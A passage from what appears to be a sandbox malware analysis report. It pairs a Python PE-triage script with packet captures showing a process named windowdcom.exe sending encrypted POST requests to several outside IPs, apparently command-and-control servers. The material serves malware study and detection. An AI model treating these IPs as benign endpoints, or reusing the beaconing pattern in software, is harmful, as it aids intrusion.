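    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) is handled here")
    entry = struct.unpack_from("<I", data, opt + 16)[0]        # AddressOfEntryPoint
    dllchars = struct.unpack_from("<H", data, opt + 70)[0]     # DllCharacteristics
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]        # NumberOfRvaAndSizes
    dirs = [struct.unpack_from("<II", data, opt + 96 + 8 * i) for i in range(ndirs)]
    secs = []
    for i in range(nsec):
        f = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        secs.append(Section(f[0].rstrip(b"\0").decode(), f[2], f[1], f[3], f[4], f[9]))
    return entry, dllchars, dirs, secs


def section_for(secs, rva):
    return next((s for s in secs if s.va <= rva < s.va + max(s.vsize, s.raw_size)), None)


def rva_to_off(secs, rva):
    s = section_for(secs, rva)
    if s is None:
        raise ValueError(f"RVA {rva:#x} is in no section")
    return s.raw_ptr + (rva - s.va)


def parse_imports(data, dirs, secs):
    """Walk IMAGE_DIRECTORY_ENTRY_IMPORT (index 1): descriptor -> thunk array -> names."""
    rva, _ = dirs[1]
    if rva == 0:
        return []
    out, off = [], rva_to_off(secs, rva)
    while True:
        oft, _, _, name_rva, ft = struct.unpack_from("<IIIII", data, off)
        if name_rva == 0:                       # null descriptor terminates the array
            break
        dll = _cstr(data, rva_to_off(secs, name_rva))
        thunk = rva_to_off(secs, oft or ft)     # prefer the unbound INT, fall back to the IAT
        while True:
            t = struct.unpack_from("<I", data, thunk)[0]
            if t == 0:
                break
            name = f"ord{t & 0xFFFF}" if t & 0x80000000 else _cstr(data, rva_to_off(secs, t) + 2)
            out.append((dll, name))
            thunk += 4
        off += 20
    return out


def imphash(imports):
    """pefile-style import hash: 'dll.func' lowercased, DLL extension dropped, comma-joined, MD5."""
    parts = []
    for dll, func in imports:
        base = dll.lower()
        base = base[:-4] if base.endswith((".dll", ".ocx", ".sys")) else base
        parts.append(f"{base}.{func.lower()}")
    return hashlib.md5(",".join(parts).encode()).hexdigest()


def triage(data):
    entry, dllchars, dirs, secs = parse_pe(data)
    imports = parse_imports(data, dirs, secs)
    ep = section_for(secs, entry)
    ent = {s.name: round(entropy(data[s.raw_ptr:s.raw_ptr + s.raw_size]), 2) for s in secs}
    flags = []
    if len(imports) < 5:                        # heuristic threshold, not a fixed rule
        flags.append("tiny import table: APIs are almost certainly resolved at runtime")
    if ep is None or ep.name != ".text":
        flags.append("entry point outside .text")
    if any(e > 7.0 for e in ent.values()):
        flags.append("high-entropy section: packed or encrypted payload likely")
    return {"entry": entry, "entry_section": ep.name if ep else None,
            "aslr": bool(dllchars & 0x40), "nx": bool(dllchars & 0x100),
            "import_dir": dirs[1], "imports": imports, "imphash": imphash(imports),
            "entropy": ent, "flags": flags}


def build_sample_pe():
    """Constructed input (not the analysed sample): a minimal two-section PE32 whose only
    static import is KERNEL32.dll!WTSGetActiveConsoleSessionId, as in the report."""
    rdata = bytearray(0x200)                                   # RVA 0x2000, file offset 0x400
    struct.pack_into("<IIIII", rdata, 0x00, 0x2040, 0, 0, 0x2060, 0x2050)  # descriptor, null one follows
    struct.pack_into("<II", rdata, 0x40, 0x2070, 0)            # OriginalFirstThunk (INT)
    struct.pack_into("<II", rdata, 0x50, 0x2070, 0)            # FirstThunk (IAT)
    rdata[0x60:0x6D] = b"KERNEL32.dll\0"
    rdata[0x72:0x8F] = b"WTSGetActiveConsoleSessionId\0"      # 2-byte hint sits at 0x70
    text = bytes.fromhex("5668F0C14000C3").ljust(0x200, b"\xCC")  # push esi; push 40C1F0h; ret; int3 pad
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "IIII" + "HH" + "I" * 6, 0x10B, 12, 0,
                      0x200, 0x200, 0, 0x1000, 0x1000, 0x2000, 0x400000, 0x1000, 0x200,
                      5, 1, 5, 1, 5, 1, 0, 0x3000, 0x200, 0, 2, 0x8140,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = bytearray(16 * 8)
    struct.pack_into("<II", dirs, 1 * 8, 0x2000, 0x28)         # IMAGE_DIRECTORY_ENTRY_IMPORT
    struct.pack_into("<II", dirs, 12 * 8, 0x2050, 0x8)         # IMAGE_DIRECTORY_ENTRY_IAT
    secs = (struct.pack("<8sIIIIIIHHI", b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
            + struct.pack("<8sIIIIIIHHI", b".rdata", 0x200, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0x40000040))
    dos = b"MZ" + bytes(0x3A) + struct.pack("<I", 0x40)         # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 2, 0, 0, 0, len(opt) + len(dirs), 0x0102)
    return (dos + b"PE\0\0" + coff + opt + dirs + secs).ljust(0x200, b"\0") + text + bytes(rdata)


if __name__ == "__main__":
    for k, v in triage(build_sample_pe()).items():
        print(f"{k:>14}: {v}")
```

To run it on a real file, replace build_sample_pe() with open(path, "rb").read(); the parser stops at PE32 on purpose, since the 64-bit optional header has different field offsets. The import count threshold is a heuristic: statically linked CRT code imports dozens of names, so a single import is a strong signal, but benign tiny stubs exist.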

                                                                                                                                                Network Behavior

                                                                                                                                                Network Port Distribution

                                                                                                                                                TCP Packets

Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Mar 28, 2021 19:28:34.114087105 CEST  49714        443        192.168.2.3      79.172.249.82
Mar 28, 2021 19:28:34.165966988 CEST  443          49714      79.172.249.82    192.168.2.3
Mar 28, 2021 19:28:34.166119099 CEST  49714        443        192.168.2.3      79.172.249.82
Mar 28, 2021 19:28:34.166656017 CEST  49714        443        192.168.2.3      79.172.249.82
Mar 28, 2021 19:28:34.216830969 CEST  443          49714      79.172.249.82    192.168.2.3
Mar 28, 2021 19:28:34.217293024 CEST  443          49714      79.172.249.82    192.168.2.3
Mar 28, 2021 19:28:34.217324972 CEST  443          49714      79.172.249.82    192.168.2.3
Mar 28, 2021 19:28:34.217418909 CEST  49714        443        192.168.2.3      79.172.249.82
Mar 28, 2021 19:28:34.217493057 CEST  49714        443        192.168.2.3      79.172.249.82
Mar 28, 2021 19:28:34.217690945 CEST  49714        443        192.168.2.3      79.172.249.82
Mar 28, 2021 19:28:34.267751932 CEST  443          49714      79.172.249.82    192.168.2.3
Mar 28, 2021 19:29:04.595930099 CEST  49723        8080       192.168.2.3      193.169.54.12
Mar 28, 2021 19:29:07.610238075 CEST  49723        8080       192.168.2.3      193.169.54.12
Mar 28, 2021 19:29:13.610925913 CEST  49723        8080       192.168.2.3      193.169.54.12
Mar 28, 2021 19:29:56.608781099 CEST  49740        8080       192.168.2.3      173.230.145.224
Mar 28, 2021 19:29:59.614701986 CEST  49740        8080       192.168.2.3      173.230.145.224
Mar 28, 2021 19:30:05.630954981 CEST  49740        8080       192.168.2.3      173.230.145.224
Mar 28, 2021 19:30:48.616257906 CEST  49742        7080       192.168.2.3      80.86.91.232
Mar 28, 2021 19:30:51.619028091 CEST  49742        7080       192.168.2.3      80.86.91.232
Mar 28, 2021 19:30:57.635288000 CEST  49742        7080       192.168.2.3      80.86.91.232
Mar 28, 2021 19:31:40.594516993 CEST  49743        80         192.168.2.3      167.114.153.153
Mar 28, 2021 19:31:40.733971119 CEST  80           49743      167.114.153.153  192.168.2.3
Mar 28, 2021 19:31:40.734286070 CEST  49743        80         192.168.2.3      167.114.153.153
Mar 28, 2021 19:31:40.734666109 CEST  49743        80         192.168.2.3      167.114.153.153
Mar 28, 2021 19:31:40.870228052 CEST  80           49743      167.114.153.153  192.168.2.3
Mar 28, 2021 19:31:40.871704102 CEST  80           49743      167.114.153.153  192.168.2.3
Mar 28, 2021 19:31:40.872344017 CEST  49743        80         192.168.2.3      167.114.153.153
Mar 28, 2021 19:31:41.008006096 CEST  80           49743      167.114.153.153  192.168.2.3
Mar 28, 2021 19:31:41.008230925 CEST  49743        80         192.168.2.3      167.114.153.153
Mar 28, 2021 19:31:41.051729918 CEST  49744        443        192.168.2.3      167.114.153.153
Mar 28, 2021 19:31:41.185789108 CEST  443          49744      167.114.153.153  192.168.2.3
Mar 28, 2021 19:31:41.185997963 CEST  49744        443        192.168.2.3      167.114.153.153
Mar 28, 2021 19:31:41.215491056 CEST  49744        443        192.168.2.3      167.114.153.153
Mar 28, 2021 19:31:41.349487066 CEST  443          49744      167.114.153.153  192.168.2.3
                                                                                                                                                Mar 28, 2021 19:31:41.351247072 CEST44349744167.114.153.153192.168.2.3
                                                                                                                                                Mar 28, 2021 19:31:41.351313114 CEST44349744167.114.153.153192.168.2.3
                                                                                                                                                Mar 28, 2021 19:31:41.351339102 CEST44349744167.114.153.153192.168.2.3
                                                                                                                                                Mar 28, 2021 19:31:41.351505041 CEST49744443192.168.2.3167.114.153.153
                                                                                                                                                Mar 28, 2021 19:31:41.351556063 CEST49744443192.168.2.3167.114.153.153
                                                                                                                                                Mar 28, 2021 19:31:41.390100002 CEST49744443192.168.2.3167.114.153.153
                                                                                                                                                Mar 28, 2021 19:31:41.523880959 CEST44349744167.114.153.153192.168.2.3
                                                                                                                                                Mar 28, 2021 19:31:41.524255991 CEST49744443192.168.2.3167.114.153.153
                                                                                                                                                Mar 28, 2021 19:31:45.875976086 CEST8049743167.114.153.153192.168.2.3
                                                                                                                                                Mar 28, 2021 19:31:45.879574060 CEST4974380192.168.2.3167.114.153.153
                                                                                                                                                Mar 28, 2021 19:32:11.552259922 CEST497454143192.168.2.380.82.115.164
                                                                                                                                                Mar 28, 2021 19:32:14.013886929 CEST4974380192.168.2.3167.114.153.153
                                                                                                                                                Mar 28, 2021 19:32:14.151556969 CEST8049743167.114.153.153192.168.2.3
                                                                                                                                                Mar 28, 2021 19:32:14.559962988 CEST497454143192.168.2.380.82.115.164
                                                                                                                                                Mar 28, 2021 19:32:20.560616970 CEST497454143192.168.2.380.82.115.164
                                                                                                                                                Mar 28, 2021 19:33:03.570384979 CEST497464143192.168.2.371.244.60.231
                                                                                                                                                Mar 28, 2021 19:33:06.564440012 CEST497464143192.168.2.371.244.60.231
                                                                                                                                                Mar 28, 2021 19:33:12.580454111 CEST497464143192.168.2.371.244.60.231
                                                                                                                                                Mar 28, 2021 19:33:55.599368095 CEST497534143192.168.2.3186.103.199.252
                                                                                                                                                Mar 28, 2021 19:33:58.599905968 CEST497534143192.168.2.3186.103.199.252
                                                                                                                                                Mar 28, 2021 19:34:04.631618977 CEST497534143192.168.2.3186.103.199.252
                                                                                                                                                Mar 28, 2021 19:34:47.565572023 CEST4975480192.168.2.337.187.4.178
                                                                                                                                                Mar 28, 2021 19:34:47.617352962 CEST804975437.187.4.178192.168.2.3
                                                                                                                                                Mar 28, 2021 19:34:48.119754076 CEST4975480192.168.2.337.187.4.178
                                                                                                                                                Mar 28, 2021 19:34:48.171474934 CEST804975437.187.4.178192.168.2.3
                                                                                                                                                Mar 28, 2021 19:34:48.682180882 CEST4975480192.168.2.337.187.4.178
                                                                                                                                                Mar 28, 2021 19:34:48.734905958 CEST804975437.187.4.178192.168.2.3
                                                                                                                                                Mar 28, 2021 19:35:19.602813005 CEST497554143192.168.2.3159.203.94.198
                                                                                                                                                Mar 28, 2021 19:35:19.728919983 CEST414349755159.203.94.198192.168.2.3
                                                                                                                                                Mar 28, 2021 19:35:20.231676102 CEST497554143192.168.2.3159.203.94.198
                                                                                                                                                Mar 28, 2021 19:35:20.355973005 CEST414349755159.203.94.198192.168.2.3
                                                                                                                                                Mar 28, 2021 19:35:20.856774092 CEST497554143192.168.2.3159.203.94.198
                                                                                                                                                Mar 28, 2021 19:35:20.980758905 CEST414349755159.203.94.198192.168.2.3
                                                                                                                                                Mar 28, 2021 19:35:51.594883919 CEST49757443192.168.2.3178.62.39.238
                                                                                                                                                Mar 28, 2021 19:35:51.645339012 CEST44349757178.62.39.238192.168.2.3
                                                                                                                                                Mar 28, 2021 19:35:51.645508051 CEST49757443192.168.2.3178.62.39.238
                                                                                                                                                Mar 28, 2021 19:35:51.646342993 CEST49757443192.168.2.3178.62.39.238
                                                                                                                                                Mar 28, 2021 19:35:51.695760012 CEST44349757178.62.39.238192.168.2.3
                                                                                                                                                Mar 28, 2021 19:35:51.695818901 CEST44349757178.62.39.238192.168.2.3
                                                                                                                                                Mar 28, 2021 19:35:51.695851088 CEST44349757178.62.39.238192.168.2.3
                                                                                                                                                Mar 28, 2021 19:35:51.695969105 CEST49757443192.168.2.3178.62.39.238
                                                                                                                                                Mar 28, 2021 19:35:51.696018934 CEST49757443192.168.2.3178.62.39.238
                                                                                                                                                Mar 28, 2021 19:35:51.696080923 CEST49757443192.168.2.3178.62.39.238
                                                                                                                                                Mar 28, 2021 19:35:51.745516062 CEST44349757178.62.39.238192.168.2.3
                                                                                                                                                Mar 28, 2021 19:36:22.640903950 CEST49758443192.168.2.379.172.249.82
                                                                                                                                                Mar 28, 2021 19:36:22.691565990 CEST4434975879.172.249.82192.168.2.3
                                                                                                                                                Mar 28, 2021 19:36:22.691874981 CEST49758443192.168.2.379.172.249.82
                                                                                                                                                Mar 28, 2021 19:36:22.692884922 CEST49758443192.168.2.379.172.249.82
                                                                                                                                                Mar 28, 2021 19:36:22.743468046 CEST4434975879.172.249.82192.168.2.3
                                                                                                                                                Mar 28, 2021 19:36:22.743844032 CEST4434975879.172.249.82192.168.2.3
                                                                                                                                                Mar 28, 2021 19:36:22.743882895 CEST4434975879.172.249.82192.168.2.3
                                                                                                                                                Mar 28, 2021 19:36:22.743963003 CEST49758443192.168.2.379.172.249.82
                                                                                                                                                Mar 28, 2021 19:36:22.744012117 CEST49758443192.168.2.379.172.249.82
                                                                                                                                                Mar 28, 2021 19:36:22.744163990 CEST49758443192.168.2.379.172.249.82
                                                                                                                                                Mar 28, 2021 19:36:22.794647932 CEST4434975879.172.249.82192.168.2.3

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 28, 2021 19:28:18.333209038 CEST | 53 | 60985 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:28:18.462861061 CEST | 50200 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:28:18.508667946 CEST | 53 | 50200 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:28:18.626938105 CEST | 51281 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:28:18.685630083 CEST | 53 | 51281 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:28:19.557064056 CEST | 49199 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:28:19.609466076 CEST | 53 | 49199 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:28:20.290985107 CEST | 50620 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:28:20.338303089 CEST | 53 | 50620 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:28:21.135827065 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:28:21.185026884 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:28:22.727469921 CEST | 60152 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:28:22.782175064 CEST | 53 | 60152 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:28:23.964756966 CEST | 57544 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:28:24.010827065 CEST | 53 | 57544 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:28:24.862818003 CEST | 55984 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:28:24.911747932 CEST | 53 | 55984 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:28:25.844981909 CEST | 64185 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:28:25.892362118 CEST | 53 | 64185 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:28:26.786560059 CEST | 65110 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:28:26.841259956 CEST | 53 | 65110 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:28:28.269788980 CEST | 58361 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:28:28.318188906 CEST | 53 | 58361 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:28:29.612639904 CEST | 63492 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:28:29.658624887 CEST | 53 | 63492 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:28:30.569458961 CEST | 60831 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:28:30.619528055 CEST | 53 | 60831 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:28:31.719748974 CEST | 60100 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:28:31.774131060 CEST | 53 | 60100 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:28:32.839832067 CEST | 53195 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:28:32.889002085 CEST | 53 | 53195 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:28:34.184566975 CEST | 50141 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:28:34.241823912 CEST | 53 | 50141 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:28:35.410376072 CEST | 53023 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:28:35.460668087 CEST | 53 | 53023 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:28:36.903141022 CEST | 49563 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:28:36.949198008 CEST | 53 | 49563 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:28:53.642086983 CEST | 51352 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:28:53.692389011 CEST | 53 | 51352 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:28:57.679600000 CEST | 59349 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:28:57.736397982 CEST | 53 | 59349 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:29:10.612979889 CEST | 57084 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:29:10.658950090 CEST | 53 | 57084 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:29:12.662720919 CEST | 58823 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:29:12.720038891 CEST | 53 | 58823 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:29:14.618266106 CEST | 57568 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:29:14.647034883 CEST | 50540 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:29:14.664524078 CEST | 53 | 57568 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:29:14.703329086 CEST | 53 | 50540 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:29:16.438498974 CEST | 54366 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:29:16.487359047 CEST | 53 | 54366 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:29:20.343095064 CEST | 53034 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:29:20.399331093 CEST | 53 | 53034 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:29:35.178041935 CEST | 57762 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:29:35.224004030 CEST | 53 | 57762 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:29:35.344281912 CEST | 55435 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:29:35.390376091 CEST | 53 | 55435 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:29:35.864279985 CEST | 50713 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:29:35.910414934 CEST | 53 | 50713 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:29:52.124835968 CEST | 56132 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:29:52.171070099 CEST | 53 | 56132 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:29:52.574883938 CEST | 58987 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:29:52.639698029 CEST | 53 | 58987 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:30:19.032155037 CEST | 56579 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:30:19.079108000 CEST | 53 | 56579 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:33:14.622618914 CEST | 60633 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:33:14.693159103 CEST | 53 | 60633 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:33:15.599318981 CEST | 61292 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:33:15.655026913 CEST | 53 | 61292 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:33:16.169764042 CEST | 63619 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:33:16.232649088 CEST | 53 | 63619 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:33:19.112665892 CEST | 64938 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:33:19.184412003 CEST | 53 | 64938 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:33:22.363785982 CEST | 61946 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:33:22.428502083 CEST | 53 | 61946 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:33:22.714662075 CEST | 64910 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:33:22.769213915 CEST | 53 | 64910 | 8.8.8.8 | 192.168.2.3
Mar 28, 2021 19:35:20.993236065 CEST | 52123 | 53 | 192.168.2.3 | 8.8.8.8
Mar 28, 2021 19:35:21.041680098 CEST | 53 | 52123 | 8.8.8.8 | 192.168.2.3

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Mar 28, 2021 19:29:35.224004030 CEST | 8.8.8.8 | 192.168.2.3 | 0x89e8 | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.trafficmanager.net | (none) | CNAME (Canonical name) | IN (0x0001)
Mar 28, 2021 19:33:14.693159103 CEST | 8.8.8.8 | 192.168.2.3 | 0x7b3f | No error (0) | prda.aadg.msidentity.com | www.tm.a.prd.aadg.akadns.net | (none) | CNAME (Canonical name) | IN (0x0001)

HTTP Request Dependency Graph

• 79.172.249.82:443
• 167.114.153.153
• 178.62.39.238:443

                                                                                                                                                HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.3 | 49714 | 79.172.249.82 | 443 | C:\Windows\SysWOW64\windowdcom.exe
Timestamp | kBytes transferred | Direction | Data
Mar 28, 2021 19:28:34.166656017 CEST | 240 | OUT | POST / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 79.172.249.82:443
                                                                                                                                                Content-Length: 420
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Ascii: d(UR<Qww8"="W7/:Mk^l!.mFb"&3SnXwgddYY}t+OT}sw|&]?J"aL[iSiimkt*3/Aadv:*Uv|@WHscW0#)~UO{Y\,C0QBds(LWnN7/N}-]:?{^ Wf4hjL>Z |BusvRbUQyoQ#cj/KEJAf>glZ-=NcJJ>Rk{
Mar 28, 2021 19:28:34.217293024 CEST | 240 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                Date: Sun, 28 Mar 2021 17:28:34 GMT
                                                                                                                                                Server: Apache/2.4.25 (Debian)
                                                                                                                                                Content-Length: 362
                                                                                                                                                Connection: close
                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.3 | 49743 | 167.114.153.153 | 80 | C:\Windows\SysWOW64\windowdcom.exe
Timestamp | kBytes transferred | Direction | Data
Mar 28, 2021 19:31:40.734666109 CEST | 8809 | OUT | POST / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 167.114.153.153
                                                                                                                                                Content-Length: 420
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Ascii: YAu<PLY8=\pNQ8^n=MM"@<l+/jh\tWLQ"kM?MLrLP<L|>\[R}W(OnwzwE9(iW4-,bX*ckv`*q+;|<XgGHB[N|d#B-O~dw#2aRr1~EQEXG.tFKJ-Aeg8|ER)!Pud/]&(sQ5W<9(|3E|V{mzTJwS0odnj|4X{'/^G]A-i9f
Mar 28, 2021 19:31:40.871704102 CEST | 8810 | IN | HTTP/1.1 302 Found
                                                                                                                                                X-Powered-By: Express
                                                                                                                                                Vary: Origin, Accept
                                                                                                                                                Access-Control-Allow-Credentials: true
                                                                                                                                                Location: https://167.114.153.153/
                                                                                                                                                Content-Type: text/plain; charset=utf-8
                                                                                                                                                Content-Length: 46
                                                                                                                                                Date: Sun, 28 Mar 2021 17:31:40 GMT
                                                                                                                                                Connection: keep-alive
                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                Data Ascii: Found. Redirecting to https://167.114.153.153


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.3 | 49757 | 178.62.39.238 | 443 | C:\Windows\SysWOW64\windowdcom.exe
Timestamp | kBytes transferred | Direction | Data
Mar 28, 2021 19:35:51.646342993 CEST | 8953 | OUT | POST / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 178.62.39.238:443
                                                                                                                                                Content-Length: 404
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Ascii: unn~L8%Wu55TZ*]DgzFARH)GAt]?AYanBmV+f8Ox%h(64e\n]=?[4XpuS83q\KZ'?npjpm8T{:!-PbDQ[E,Sf`(SP=+q!.j{\8Yqa/^h`*f>~BL8DT9-z*tCxYd8oyFeon2q$i!Bm)_;dR-zmy
Mar 28, 2021 19:35:51.695818901 CEST | 8954 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                Date: Sun, 28 Mar 2021 17:35:51 GMT
                                                                                                                                                Content-Type: text/html
                                                                                                                                                Content-Length: 682
                                                                                                                                                Connection: close
Data Ascii: <html><head><title>400 The plain HTTP request was sent to HTTPS port</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><center>The plain HTTP request was sent to HTTPS port</center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.3 | 49758 | 79.172.249.82 | 443 | C:\Windows\SysWOW64\windowdcom.exe
Timestamp | kBytes transferred | Direction | Data
Mar 28, 2021 19:36:22.692884922 CEST | 8956 | OUT | POST / HTTP/1.1
                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                Host: 79.172.249.82:443
                                                                                                                                                Content-Length: 388
                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Data Ascii: |^.X=!_Z<g&D,8t_6Nkc-@QqQG{~nd"CmP$]TFbpIr6!7ZyYN$Pl|c<=z-PWFLH7pGUy(gU^>mkGj`{kms2#}T6!:So[hyX,aICIF%d!'=Q'-0uc9Y+xo~b6s7-scw8$IOQoN
Mar 28, 2021 19:36:22.743844032 CEST | 8956 | IN | HTTP/1.1 400 Bad Request
                                                                                                                                                Date: Sun, 28 Mar 2021 17:36:22 GMT
                                                                                                                                                Server: Apache/2.4.25 (Debian)
                                                                                                                                                Content-Length: 362
                                                                                                                                                Connection: close
                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br />Reason: You're speaking plain HTTP to an SSL-enabled server port.<br /> Instead use the HTTPS scheme to access this URL, please.<br /></p></body></html>


